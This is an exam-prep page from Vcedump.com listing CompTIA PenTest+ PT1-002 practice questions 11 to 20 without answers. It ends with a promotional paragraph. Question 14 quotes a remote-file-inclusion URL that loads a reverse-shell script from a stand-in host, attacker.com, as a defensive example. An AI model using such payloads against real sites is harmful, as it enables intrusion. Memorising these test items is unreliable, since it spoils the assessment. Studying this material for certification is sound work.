Exam Details

  • Exam Code: PT1-002
  • Exam Name: CompTIA PenTest+ Certification Exam
  • Certification: CompTIA PenTest+
  • Vendor: CompTIA
  • Total Questions: 131 Q&As
  • Last Updated: May 12, 2024

CompTIA PenTest+ PT1-002 Questions & Answers

  • Question 11:

    Which of the following documents BEST describes the manner in which a security assessment will be conducted?

    A. BIA

    B. SOW

    C. SLA

    D. MSA

  • Question 12:

    After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host. Which of the following is the MOST likely cause?

    A. Services are not listening

    B. The network administrator shut down services

    C. The host was not reachable

    D. A firewall/IPS blocked the scan

  • Question 13:

    Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

    A. The tester discovers personally identifiable data on the system

    B. The system shows evidence of prior unauthorized compromise

    C. The system shows a lack of hardening throughout

    D. The system becomes unavailable following an attempted exploit

    E. The tester discovers a finding on an out-of-scope system

  • Question 14:

    While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

    https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

    Which of the following remediation steps should be taken to prevent this type of attack?

    A. Implement a blacklist.

    B. Block URL redirections.

    C. Double URL encode the parameters.

    D. Stop external calls from the application.

  • Question 15:

    A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

    A. Sample SOAP messages

    B. The REST API documentation

    C. A protocol fuzzing utility

    D. An applicable XSD file

  • Question 16:

    A penetration tester wants to target the NetBIOS name service. Which of the following is the most likely command to exploit the NetBIOS name service?

    A. arpspoof

    B. nmap

    C. responder

    D. burpsuite

  • Question 17:

    A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?

    A. Insider threat

    B. Nation state

    C. Script kiddie

    D. Cybercrime organization

  • Question 18:

    An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling.

    Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

    A. Selection of the appropriate set of security testing tools

    B. Current and load ratings of the ICS components

    C. Potential operational and safety hazards

    D. Electrical certification of hardware used in the test

  • Question 19:

    A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

    A. Data flooding

    B. Session riding

    C. Cybersquatting

    D. Side channel

  • Question 20:

    During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)

    A. Scraping social media sites

    B. Using the WHOIS lookup tool

    C. Crawling the client's website

    D. Phishing company employees

    E. Utilizing DNS lookup tools

    F. Conducting wardriving near the client facility

Tips on How to Prepare for the Exams

Certification exams are increasingly important, and more and more enterprises require them of job applicants. But how do you prepare for the exam effectively? How do you prepare in a short time with less effort? How do you get an ideal result, and where do you find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provides not only CompTIA exam questions, answers and explanations but also complete assistance with your exam preparation and certification application. If you are unsure about your PT1-002 exam preparation or CompTIA certification application, do not hesitate to visit Vcedump.com to find your solutions.